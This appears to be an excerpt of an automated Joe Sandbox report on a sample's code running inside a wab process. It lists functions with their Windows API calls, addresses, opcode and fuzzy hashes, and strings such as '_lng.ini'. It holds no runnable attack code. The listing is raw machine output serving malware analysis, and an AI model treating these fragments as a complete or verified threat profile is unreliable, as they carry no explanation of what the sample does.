                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3727323765-0
                                                                                                                                                                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                                          • Opcode ID: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                          • String ID: d=E
                                                                                                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                                                                                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                          • String ID: URL
                                                                                                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
